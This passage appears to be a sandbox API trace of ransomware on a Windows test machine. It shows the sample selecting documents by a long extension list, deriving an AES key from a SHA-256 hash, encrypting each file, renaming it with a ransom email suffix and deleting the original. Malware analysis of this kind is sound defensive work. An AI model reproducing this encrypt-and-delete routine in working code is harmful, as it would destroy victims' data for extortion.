ind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0188.195] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.195] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.195] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0188.196] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x7c04, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x7c04, lpOverlapped=0x0) returned 1
	[0188.237] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.237] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb198) returned 1
	[0188.238] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.238] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0188.238] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.238] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0188.238] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.238] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9370) returned 1
	[0188.238] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.239] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x7c04, dwBufLen=0x7c04 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x7c10) returned 1
	[0188.239] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.240] RtlMoveMemory (in: Destination=0xfe4d90, Source=0xfdd180, Length=0x7c04 | out: Destination=0xfe4d90) 
	[0188.240] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.240] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe4d90*, pdwDataLen=0x18aefc*=0x7c04, dwBufLen=0x7c10 | out: pbData=0xfe4d90*, pdwDataLen=0x18aefc*=0x7c10) returned 1
	[0188.240] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.240] CryptDestroyKey (hKey=0xfb9370) returned 1
	[0188.240] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.240] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0188.240] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.240] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0188.241] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.241] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.241] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.241] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0188.242] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 119
	[0188.242] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0188.244] WriteFile (in: hFile=0x388, lpBuffer=0xfe4d90*, nNumberOfBytesToWrite=0x7c10, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe4d90*, lpNumberOfBytesWritten=0x18b358*=0x7c10, lpOverlapped=0x0) returned 1
	[0188.248] CloseHandle (hObject=0x388) returned 1
	[0188.248] CloseHandle (hObject=0x2c0) returned 1
	[0188.248] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx")) returned 1
	[0188.252] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\swx3yplraf4uemxfmvji.docx")) returned 0
	[0188.252] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1ec83e0, ftCreationTime.dwHighDateTime=0x1d96f75, ftLastAccessTime.dwLowDateTime=0x939dcd00, ftLastAccessTime.dwHighDateTime=0x1d97448, ftLastWriteTime.dwLowDateTime=0x939dcd00, ftLastWriteTime.dwHighDateTime=0x1d97448, nFileSizeHigh=0x0, nFileSizeLow=0xe79b, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC5It4MEY5fnQy5bf5S.xls", cAlternateFileName="VC5IT4~1.XLS")) returned 1
	[0188.252] lstrcmpW (lpString1="VC5It4MEY5fnQy5bf5S.xls", lpString2="..") returned 1
	[0188.252] lstrcmpW (lpString1="VC5It4MEY5fnQy5bf5S.xls", lpString2=".") returned 1
	[0188.252] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0188.252] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="VC5It4MEY5fnQy5bf5S.xls" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\VC5It4MEY5fnQy5bf5S.xls") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\VC5It4MEY5fnQy5bf5S.xls"
	[0188.253] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\VC5It4MEY5fnQy5bf5S.xls") returned 75
	[0188.253] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.253] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\VC5It4MEY5fnQy5bf5S.xls", cchLength=0x4b | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls") returned 0x4b
	[0188.253] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.253] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls", lpSrch="help_decrypt_your_files") returned 0x0
	[0188.253] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls"
	[0188.253] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls") returned 75
	[0188.253] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.253] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.254] StrStrW (lpFirst=".xls", lpSrch=".") returned=".xls"
	[0188.254] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.254] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xls") returned=".xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0188.254] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.254] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.254] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\vc5it4mey5fnqy5bf5s.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0188.257] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xe79b, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0xe79b, lpOverlapped=0x0) returned 1
	[0188.262] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.262] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb5d8) returned 1
	[0188.264] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.264] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0188.264] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.264] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0188.264] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.264] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb95f0) returned 1
	[0188.264] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
